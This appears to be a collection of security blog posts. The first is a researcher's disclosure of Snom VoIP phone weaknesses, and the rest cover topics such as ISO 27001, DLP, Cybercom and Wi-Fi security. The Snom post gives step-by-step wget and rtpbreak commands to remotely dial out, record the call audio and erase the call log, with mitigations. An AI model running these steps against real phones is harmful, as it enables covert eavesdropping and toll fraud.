I have a bit of history in attacking VoIP phones, specifically VoIP Wifi phones. Way back in 2005-2006 I purchased several VoIP Wifi phones and conducted very basic security analysis to demonstrate a commonality of vulnerabilities, most notably that many of them had a number of open ports and extraneous services.

This research resulted in several CVEs, including some companies that should have known better. I also spoke a few conferences, and you can check out my Shmoocon slides from 2006.

Most importantly of all, my findings of the VXworks debugging port of UDP/17185 was recently deeply expanded upon by none other than HD Moore who released research and a set of tools that is truly awe-inspiring when it comes to attacking VXworks debugging.

For myself, it was humbling to see HD take this to a level that I can only dream of someday attaining.

So, last week, Michael Sutton at Zscalar wrote a blog post about misusing a new feature in HP Printers called WebScan. Essentially, WebScan functionality allows a user to scan a document that is physically on the printer and save the image to the local computer.

HP's WebScan is an excellent example of how a device's features are all too often are leveraged by attackers, and Michael's post inspired me to look at some recent features ripe for abuse in VoIP phones.

One area that I wanted to revisit is attackers able to control a VoIP phone dialing. Back in 2006 I identified a feature in Clipcomm VoiP Wifi phones that would allow an attacker to log into the phone via telnet and place a call from the VoiP Wifi phone to any number. Pretty bad stuff, right?

Looking at some of the newer VoIP phones from Snom, however, and there's a webpage on the Snom's webserver that allows one to enter in a number to dial. A useful feature, so long as your Snom has authentication set on the webserver, otherwise anyone with access to that webpage can make a call. From the Snom user's perspective, this feature will start a call from your Snom on the speakerphone.

So, with this kind of feature, an attacker could search for Snom phones exposed on the Internet, determine if they are using HTTP authentication, and if they are not, could easily connect the the Snom VoIP phone's webserver and punch in the number to dial -- clearly opening up avenues to cause grief such as expensive 900 numbers, prank calls, etc.

Really, this is not a big deal, and is more of a headache than anything else. But what if an attacker could remotely capture on the phone the voice streams from a call that she placed? That ups the ante a bit, and such an attack is possible by abusing features!

Snom VoIP Phone PCAP Trace 

Some Snom VoIP phones have a feature called "PCAP Trace" that allows, via the web interface, the start/stop and download of a PCAP file on the Snom VoIP phone -- the screenshot below shows the actual page on the VoIP phone, a Snom 360 in this case.

The Snom PCAP Trace feature does have limitations in that it the PCAP data is stored in a circular buffer because of memory limitations, and that enabling PCAP capture can impact the phone's performance (no surprise here). Still, it is a scary feature that if not secured creates an attack vector where a remote attacker can literally tap your phone.

Remote Tapping Your Snom VoIP Phone

To start/stop a PCAP on the Snom VoIP phone, one just clicks on the 'Start' or 'Stop' buttons on the phone webpage. After the capture is complete, an attacker can then download the PCAP trace and extract the audio using Wireshark or the amazing command-line RTPbreak by Michele Dallachiesa.

So, combining the web page place call feature with the PCAP trace feature, an attacker can make a Snom VoIP phone call any number and then the attacker can capture the call remotely on the Snom VoIP phone.

For the final touch, an attacker can also delete the call record of the last call made, thereby wiping the apparent record of the call, at least on the Snom VoIP phone itself. Scary? You betcha. The following is a walk-through of the seven steps -- you can code this up for yourself or download my handy-dandy snom_call_tap.sh script -- please do be ethical and responsible with this script.

Poor Man's NSA -- Step-by-Step

Step 1: Start the tap on the Snom Web interface wget --post-data='start_pcap=Start' $1/pcap.htm -O logz_$1/start_pcap.html

Step 2: Place the call to the target through the Snom Web Interface wget --post-data='NUMBER='$2'&DIAL=Dial&active_line=1' $1 -O logz_$1/place_call.html

Step 3: Stop the tap on the Snom Web interface wget --post-data='stop_pcap=Stop' $1/pcap.htm -O logz_$1/stop_pcap.html

Step 4: Pull the PCAP from the Snom Web Interface wget http://$1/trace.pcap -O logz_$1/trace_$1.pcap

Step 5: Run RTPbreak to extract the RTP stream from the PCAP rtpbreak -P2 -t100 -T100 -d logz_$1 -r logz_$1/trace_$1.pcap

Step 6: Run SOX to marry the extracted audio into single WAV file sox -r8000 -c1 -t ul logz_$1/rtp.0.0.raw -t wav logz_$1/0.wav

Step 7: Delete the last call record to cover tracks wget http://$1/adr.htm?dialeddel=1 -O logz_$1/del_call_log.htm

So, there you have it. What makes this kind of feature especially problematic are two things. First, known vulnerabilities in some Snom phones allows an attacker to bypass authentication.

Second, Shodan, which I've written about before here and here, makes it easy for attackers to locate vulnerable Snom phones. I leave following-up on these aspects an exercise for the reader.

Mitigation

Don't like the possibility of some miscreant controlling your Snom VoIP phone, making calls on your behalf and tapping your calls? I expect that you don't. Here are some humble suggestions to help you to mitigate your risk.

Avoid putting VoIP phones on public IP if at all possible Use latest code for VoIP phones that patches known vulnerabilities Enable authentication on the VoIP phone's Web interface and use a strong password Send logs from phone to another server and review for abuse Train phone users to recognize their VoIP phone is compromised (slow running, makes calls by itself, etc.).

Demand from vendors firmware images that do not have such dangerous functionality -- or at least have more authentication to use this kind of "feature" Support alternatives like the Open Snom Project.

In reading a recent article published at PRWire I am reminded of an article I read in 2002 that demonstrated how the dot com bust would have significant implications in about 4-8 years.

The premise was that with no Americans actively seeking college education in information systems, there would be a significant gap in our indigionous talent pool.

While these exercises demonstrated in the above article are great, it is important to note that the NSA and DHS have a jointly funded what is essentially an R.O.T.C. program.

The problem exists where the graduates are pretty much all farmed out to DoD and in limited instanced DHS. So what about CIP in the private sector? Not just power plants but also state government and first responder communication infrastructures?

These organizations still go insufficiently protected by technology and even if they have the right tech, who do they have to adequately handle the operational and managerial aspects of security?

A question I have for the group is this: "IF" a scenario existed whereby you (A CIP) were a US Citizen, cleared, certified, and possess solid credentials and can be hired for $50-65K a year, would that be worth it for the same CIP organization to subsudize a government kitty-pot for say $15K a year?

Think about what you get on the backend and for what investment. I am eager to learn more from the audience the thought on such a premise.

Thanks,

Carter Schoenberg, CISSP

 

In my previous blog on Malware-resilient Software-as-a-Service Strong Authentication the issue of trust was raised. The current blog quotes publication named  Extending the Trusted Path in Client-Server Interaction by Hanno Langweg and Tommy Kristiansen.

Interacting with the local human user is the weak point in client-server communications. While machines can employ crypto-graphical mechanisms to ensure authenticity, integrity, and confidentiality of communication, humans are not capable of this. They rely on their local computer to present data and transmit their input to a server reliably. 

Today’s operating systems provide protection against unauthorized modification of operating system components and offer mechanisms like discretionary access control and process separation to users and processes. Often, all processes of the same user operate with the same privileges. 

Malicious software (malware) can exploit this fact to read input destined for other processes (e.g. a key-logger) or modify the output displayed to the user (e.g. local phishing attack).A server application needs a trusted path to the user at a network node.

This concept is not new and exists in operating systems. The secure attention sequence Ctrl+Alt+Del in MicrosoftWindows is an example of how the user can invoke a trusted path to the operating system to log on.

Output of a trusted path cannot be manipulated by other processes and input cannot be read. The process using a trusted path can be sure that input and output are shared only with the user.

Trusted Path definition: A mechanism by which a person at a terminal can communicate directly with the Trusted Computing Base. This mechanism can only be activated by the person or the Trusted Computing Base and cannot be imitated by untrusted software.

In the Microsoft Windows operating system, applications typically receive information about user actions by messages. Since these can be sent by malicious programsas well, they are a convenient attack vector. It is a vulnerability by design – Windows treats all processes equally that run on the same desktop.

If one needs an undisturbed interface, a separate desktop attached to the interactive window station should be assigned.  However, managing separate desktops can be cumbersome for software developers.

So most of today’s software that interacts with a local user runs in a single desktop shared by benign and malign programs. A number of applications today are structured after the client-server pattern: internet banking, contract signing, e.g. in e-government, or online voting.

Here, the main application is run on highly protected servers. Users connect to the server from their local machine. The machine acts as a smart terminal, collecting user input, transmitting it to the server, receiving server data and displaying server output.

The local user initiates and completes transactions with the server application. The user interacts with a local application via the local user interface. Some problems immediately arise:

1. How do user and application know which server they are talking to?

2. How does the server know which application it is talking to?

3. How does the user know which application input is directed to?

4. How does the user know which application produces the output?

5. How does the application know that user received the output?

6. How does the application know where input comes from?

The first two problems can be solved by using a cryptographic protocol that offers secure authentication of the communicating parties and integrity of the communication, e.g. SSL.

The strength of the cryptographic algorithm relies on access of the adversary to encrypted data and on it being computationally infeasible to decrypt the data or forge a digital signature.

The remaining four questions demand a trusted path between the local application and the user. The local user interface is the weak link in the interaction of the user with the server application.

An adversary is much more likely to attack here than spending resources on breaking a cryptographic algorithm – breaking cryptography is typically either a formidable mathematical challenge or requires a large amount of computing resources.

Attacks on the server are another option. However, a server is usually easier to protect than a large number of clients.

It may be possible to distinguish users and untrustworthy programs by observing their input behavior…

Our approach:

Our approach to finding trusted path does not rely on particular PC architectural strengths or weaknesses but rather on basic limitation on malware.

Limitation 1: Physically speaking  to the PC microphone is impossible for any  program residing on the  same PC.

Therefore client authentication software, requiring the user to actually speak to the PC microphone will be able to establish a trusted path to the authentication server.

On the other hand malware residing on the same computer will not be able to complete the authentication, even though it collected all necessary digital information, through key-loggers, etc…

Fig.1 : Malware un-capable to speak to PC microphone.

Limitation 2: Manipulating displayed data by one program is detectable by another program.

Protecting integrity of the information displayed to the user from being manipulated by malware is another issue. In the case malware does not care much to attack authentication mechanism, all it cares about is manipulating display.

If all processes share the same display, then it is possible to detect the discrepancy between the data presented to the user for his/her confirmation and the data being actually digitally signed.

Here again we are taking the physical path – malware can manipulate display, but this manipulation can be detected.

Fig.2 Malware is capable to manipulate display, but un-capable to steal transaction.

You have already implemented ISO 9001? You have heard that ISO 27001 might be a good idea? But how can something that has to do with quality help you implement information security?

It can, more than you may think. ISO 9001 specifies how the quality management systems (QMS) must look, while ISO/IEC 27001 specifies the information security management systems (ISMS). Therefore, the "management systems" part is the same - so what is it actually?

The philosophy of management systems has grown from the theory developed by W. Edwards Deming during the second half of 20th century, and is based on the Plan-Do-Check-Act cycle.

Basically, this cycle consists of the following: in the Plan phase you have to plan what you want to achieve with the management system, in the Do phase you implement it, in the Check phase you constantly monitor whether you have achieved what you planned, and in the Act phase you make improvements, i.e. fill the gap between what you have planned and what you have achieved.

Although this cycle was invented with quality management in mind, it was established as a foundation for all other management systems - information security (ISO/IEC 27001), environment (ISO 14001), business continuity (BS 25999-2), etc.

It means that some of the elements you have implemented for the quality management system according to ISO 9001 you can use for the information security management system as well - here is the list:

• Document management - the procedure used for document management in QMS can be used for the same purpose in ISMS, with only minor adjustments
• Internal audit - the same procedure can be used for both QMS and ISMS, although the internal audit itself would usually be done by different people since it is not very likely that one person would have deep enough knowledge of both information security and quality
• Corrective and preventive actions - the procedure used for QMS can be used for the same purpose in ISMS, although it is likely that different persons will be solving issues related to QMS or ISMS
• Human resources management - the same cycle of HR planning, training and evaluation is used for both management systems; naturally, the difference is in the profile of needed skills and knowledge
• Management review - the principles for management review are the same for both management systems; although it would not be recommendable to perform both reviews in parallel, management will already be accustomed to making decisions in QMS, so they will have better understanding of how to make decisions in the context of ISMS
• Setting the business goals and tracking whether they have been achieved - the same mechanism is laid down in both standards, so management will be used to such systematic planning

Therefore, if you have already implemented ISO 9001, you will have an easier job implementing ISO 27001 (and vice versa) - you could save up to 30% of time. Further, you will have cheaper certification audits since certification bodies are offering the so called "integrated audits", which means they will do both ISO 9001 and ISO 27001 in the same audit, charging you a smaller fee compared to separated audits.

If your QMS is functioning well, you will find your ISMS project developing rather smoothly - management will have better understanding of potential business benefits, while all organizational units will be accustomed to the necessity of defining precise procedures, responsibilities and documentation.

Having a QMS indeed provides very good foundation for information security - if you already have ISO 9001, do give a serious thought to ISO 27001.

Cross posted from ISO 27001 & BS 25999 blog - http://blog.iso27001standard.com

Article by Tamir Elchayani, Technical Training Engineer

Data Leakage Prevention (DLP) practices are implemented in order to prevent the unauthorized distribution of confidential/private information. Because email was not originally developed with security as a top priority, the transfer of sensitive information is immediately exposed to a range of threats.

The limitations of the SMTP protocol, industrial espionage, disgruntled employees and the growing frequency of identity theft represent only a fraction of the threats to an organization’s emails.

While these threats are real and must be addressed, it is crucial that a DLP system and policy be consistent with a company’s overall strategy so that employee expectations about privacy can be reasonably managed.

Sensitive information is typically characterized by keywords, textual or numerical patterns (i.e. credit card number, social security number etc.) and other content-related phrases. PineApp’s policy-driven DLP module, for instance, scans all outgoing emails for the presence of content that has been defined by an organization’s own policy.

An email that is flagged, due to these predefined criteria, is immediately intercepted and system administrators are instantly notified.

While it may be obvious to company management that all emails ought to be reviewed and scanned for security purposes, a company must make it clear to their employees that someone is NOT reading every email in their system.

This “Big Brother” perception must be acknowledged and addressed from the very beginning stages of a DLP policy development.

When applying DLP to an organization’s email server, IT managers need to maintain a delicate balance between their company’s security interests and the end-user’s privacy. This balance is only possible through a coherent policy that is aligned with the management of sensitive data in all facets of the organization.

Cross-posted from PineApp

With the recent (May 21, 2010) formation of the Cyber Command (Cybercom), the Department of Defense will manage the war on Cyber Terrorism under unified leadership. Domestic Cyber efforts will remain under the Department of Homeland Security (DHS).

An important step in the new CYBERCOM organization is the inclusion of the Cyber assets and capabilities of the Defense Information Systems Agencies which will also move to the Ft. Meade Maryland campus where the National Security Agency is headquartered.

The creation of CYBERCOM is a leap forward in the war on International Cyber Terrorism and the challenges are huge. The new CYBERCOM, as a military and intelligence organization should approach the issue of Cyber Terrorism as a military campaign rather that a criminal action. Offensive Cyber operations and counter strikes will be approached with military precision like any other military campaign.

CYBERCOM is expected to be operational by the end of 2010. This is not soon enough for many observers.

Our Competitors and Potential Adversaries are Significantly Ahead of the United States

Russia and China have a decidedly different attitude toward Cyber Security and attacks.

For a number of reasons, but primarily the refusal by the United States to view International Cyber Terrorism as a military threat, the United States has failed to keep pace with international Cyber Terrorism. And, because of our total dependence on data networking, the U.S. is at greater risk than our competitors.

Many informed sources believe that we are in a Cyber war already and we are losing.

No country in the world is more dependent on its computers than the United States. Data networks now underlie the U.S. power grid, its military operations and the telecommunications, banking and transportation systems. That means the U.S. is uniquely vulnerable to sophisticated computer hackers.

This is not a theoretical problem. In the Department of Defense’s most recent Quadrennial Defense Review, cyber attacks in the military sector have averaged over 5,000 per day for the last two years.

During the first half of 2009, there were reported at least 43,785 incidents of malicious cyber activity directed against the U.S. Department of Defense. These incursions came from a variety of sources, ranging from criminal hackers to foreign governments, and remediation alone cost the Defense Department more than $100 million. That figure does not account for the significant cost of data lost to cyber espionage.

And the source of the attacks has raised troubling questions. China has been identified as a suspect including Denial of service attacks in the networks that affect troop deployments and logistic in crisis areas as well Cyber incursions at the Pentagon , U.S. military bases throughout the world, and the power grid that supplies 90% of the requirements for the Department of Defense.

Cyber-security specialists say Russia and China rely on proxy groups to conduct attacks on enemies, as Russia allegedly did in 2008 against Georgia. China and Russia deny such accusations.

Russia realizes the threat. Senior Russian analysts draw a parallel between nuclear and cyber weapons, because cyber weapons can affect a huge amount of people as well as nuclear. The main difference between nuclear and cyber weapons, the Russian believe is that Cyber weapons are very cheap, easy to use and almost free of charge.

Russia wants to forge a kind of cyber arms-control agreement, but, in the past, the United States was primarily interested in forging formal agreements to fight cybercrime. CYBERCOM however, in a major change of policy is urging now for a Cyber weapons control treaty. This first step is a major positive development.

CYBERCOM and Cyber Jobs

During the formative stages of CYBERCOM, new contracting job opportunities will be small with the military services and other clients procuring the lion’s share of new services. But the wartime approach of CYBERCOM will require significantly more Cyber professionals as that realized threat grows and is addressed.

In addition, the formation of CYBERCOM may open a pathway for service contracting opportunities at the National Security Agency (NSA) where higher level security clearances are required. With the move of DISA (Defense Information Security Agency) to the Ft. Meade campus, contractor access and the security clearance process is better facilitated.

Contractors can hire and place qualified Cyber personnel at DISA and provide services concurrent with obtaining higher level clearances. This opens the window for Cyber professional to access the Intelligence Community without the burden of holding employees on overhead.

Since 2003 Aspiration Software LLC has provided Cyber Security services to the Intelligence Community and the Department of Defense.

 

In one of the funniest cases of website mis-identification to date, recent visitors to the Belvoir Castle website unexpectedly found a black page displaying the Algerian flag and the following Arabic text:

"The cause of this hack is Israel's presence. Internet law does not protect the ignorant. Thank you to all the pirates of Algeria."

So what was the occupants of Belvoir Castle doing that drew the Algerian hackers attention?

Well... They were having a teddy bear picnic!

And these weren't you average, run of the mill Israeli Commando teddys either. They were just your regular, everyday, plush, fluffy, adorable little teddy bears.

Belvoir Castle, the former home of the Dukes of Rutland, is a beautiful castle in the Leicestershire countryside. It is now open to the public and they have weddings, costumed guided tours and apparently, clandestine Israeli Teddy Bear briefings.

Though some say that the Algerians had mistaken Belvoir Castle with Belvoir Fortress, the former crusader castle in Israel, I am not so sure. One look at those coal black teddy bear eyes and you just know that they are highly trained warriors. But if they are right, the Algerian hackers were off target by, oh about 2000 miles...

Pretty funny stuff.

In other news, Iran mysteriously adds all Teddy Bears to their "No Fly list".

Cross Posted from CyberArms. 

In 2009, there were a reported 140 million records compromised, compared to 360 million in 2008. In 2010 there have been almost 13 million records stolen. But don’t have a party just yet.

Criminals are fine-tuning their craft and getting better. The industry just isn’t making it as easy. 97% of those records were stolen using malware – malicious software designed to attack the target’s existing systems and software in place.

A reported 50% of the malware was installed remotely. Almost 20% came from visiting infected websites and almost 10% was installed when employees clicked infected links that conned or “socially engineered” them.

A recent Verizon report stated, “Over the last two years, custom-created code was more prevalent and far more damaging than lesser forms of customization, the attackers seem to be improving in all areas: getting it on the system, making it do what they want, remaining undetected, continually adapting and evolving, and scoring big for all the above.”

This may be also attributed to an inside job. A rogue employee on the inside always has the advantage of knowing exactly how to remain undetected.

The report further stated that organized crime rings may “recruit, or even place, insiders in a position to embezzle or skim monetary assets and data, usually in return for some cut of the score, the smaller end of these schemes often target cashiers at retail and hospitality establishments while the upper end are more prone to involve bank employees and the like.”

In the past three years that’s a total of 513 million records. On average, every citizen has had his or her data compromised almost twice. Where’s your Social Security number in that mix?

To ensure peace of mind, subscribe to an identity theft protection service, such as McAfee Identity Protection, which offers proactive identity surveillance, lost wallet protection, and alerts when suspicious activity is detected on your accounts. For additional tips, please visit http://www.counteridentitytheft.com

Robert Siciliano is a McAfee consultant and identity theft expert. See him discuss another data breach on Fox News. (Disclosures)

Altering the Economics of Cybersecurity

"Economic incentives currently favor the attackers - attacks are easy, cheap, you can steal billions and your chances of getting caught are slim. If we can increase the cost to the attackers and increase the profitability of good cyber defense we can create a sustainable system..." -- Larry Clinton, Internet Security Alliance President and CEO

McAfee on APTs

"If they don’t know what it is, it’s an APT. While the attacks aren’t new — they have happened in the government world for a long time — the realization of what is going on is new. It can be difficult for an organization to sort out whether it is just a zero-day malware or if the organization is being specifically targeted. In the conventional world, if somebody launches a missile, you can pretty much understand what the intent is and you can attribute it. In the cyber world, if someone launches an attack, you might not be sure who is behind it and you don’t know what the intent is. In the military world, they make a distinction between information gathering and an actual attack..."  -- George Kurtz, worldwide CTO for McAfee

Microsoft on Privacy

"Every piece of data on the Internet maps back to who created it and who they know. Where they were when they did it, where they've been and where they plan to go. What they are interested in, attend to, and interact with, and is around them, and when they do these things. The contextualization of the web in the world and the connection of the world to the web, mediated by the connections of people to each other, is forming a new Internet which has vast implications of privacy, identity, and innovation; and how we are going to structure our societies and our economies..." -- Marc Davis, Partner Architect at Microsoft Online Services Division

Lynn on National Cyber Strategy

“The principal elements of that strategy are to develop an organizational construct for training, equipping, and commanding cyberdefense forces; to employ layered protections with a strong core of active defenses; to use military capabilities to support other departments' efforts to secure the networks that run the United States' critical infrastructure; to build collective defenses with U.S. allies; and to invest in the rapid development of additional cyberdefense capabilities. The goal of this strategy is to make cyberspace safe so that its revolutionary innovations can enhance both the United States' national security and its economic security...” -- William Lynn,the US Deputy Secretary of Defense

Cross-posted from Dr. Infosec

Do you have a wireless router? Is it appropriately configured to be secure? Why bother? I've three reasons.

• War Driving - The revelation by Google of its inadvertent collection of publicly broadcasted SSID (the Wi-Fi network name) and MAC addresses (device identifier) while conducting their Street View data collection should serve as a reminder to tighten up our router security. Remember, anyone driving or sitting in proximity to your business, home or office may be within the exploitable footprint of Wi-Fi signal. Once within your router's footprint they too can collect your SSID and MAC addresses, and if your network is not secured, their odds of being able to collect the information traversing from one end of the connection to the next just increase exponentially.
• Liability -- A German court recently fined an owner of a wireless router for not appropriately securing a device and thus allowing the device to be used by a third party to connect to the internet via the router and engage in illegal download activity. The court in Karlsruhe, Germany noted "Private users are obligated to check whether their wireless connection is adequately secured to the danger of unauthorized third parties abusing it to commit copyright violation." The court noted that owner could be fined up to 100 Euros. Regardless of the laws in your area, legal problems are only one of many reasons to ensure your router is secure.
• Mistaken Identity -- As noted in the prior point, a third party used the connectivity provided by the unencumbered access to an individual's router to perpetrate a crime. Think of how crime-solvers walk their data back. They trace the Internet Protocol address. If that IP address ends at your router, then it is not an inappropriate conclusion to assume the perpetrator of the crime is someone within your home/office/business. Think about the physical inconvenience of being taken down to the local precinct to sort things out; the property seizures and recovery prospects and while you will no doubt be able to explain your way out of a situation, as did the owner of the router in Germany - why put yourself in this position?

If you see your neighbor's Wi-Fi in an unsecure state (e.g., open access) let them know. Don't assume the owner configured the device, perhaps it was a more technically savvy neighborhood high school student or a for hire network installer -- who in both cases failed to put a WPA2 password in place.

In Queensland, Australia the police are identifying unprotected Wi-Fi during their routine patrols and notifying their owners in an effort to protect unwary citizens from their own unprotected routers. This is something suitable for neighborhood watch organizations.

Use a strong password (8-14 characters which aren't a word and include non-predictable symbols [ e.g. (B$@iJH91$(~(K ]. If your router is using WEP encryption and not WPA2 then think about upgrading that router of yours.

You may also consider limiting access to your network to MAC addresses you own or know. Don't forget to set up separate guest connectivity to leave a clear audit trail distinguishing between your use and guest users whom you have no control over.

This could be especially important for the small business owner whose network may be used by an unscrupulous individual.

Cross-posted from Christopher Burgess, Huffington Post

 

 

I’ve long contended that SaaS applications give the ability to build very specific vertical applications that tie together several different functional areas to really meet the needs of a particular class of business.

Cloud applications – with their general adoption of APIs and resulting ease of integration with other apps, make this “quasi suite” approach viable. Intacct today announced an example of this in action.

Intacct, the SaaS accounting vendor, has partnered with Avectra, a company that provides software tools for member-based organizations. The integration sees Avectra’s association management system, a tool to manage member information, contact details and event information, along with Intacct’s accounting functionality.

The aim of this is for member based organizations to have a management tool that gives them end-to-end control within their organization.

Specific benefits that this sort of integration can bring include:

Greater Automation: Having the ability to automate workflows can save time and reduce errors within an organization Increased Productivity: Re keying data makes no sense – integrated systems remove the need for it Automated Billing and Revenue Recognition: Integrating customer-facing systems with he accounting systems help with the cashflow of the organization Real Time Business Visibility: Again integrating the customer facing and account parts of the business allows for meaningful dashboards and information

While the particular details of this integration are likely to only be interesting to people with an involvement in a member-based organization, it is a great example of two distinct applications doing the heavy lifting and producing a highly tailored combined application.

Chris Anderson’s oft-quoted “long tail” theory discussed the niche strategy of selling a large number of unique items in relatively small quantities. Cloud computing is the enabler that will allow vendors to meet the needs of long tail end users, more quickly, more easily, and more successfully than in a disconnected world.

Cross-posted from Diversity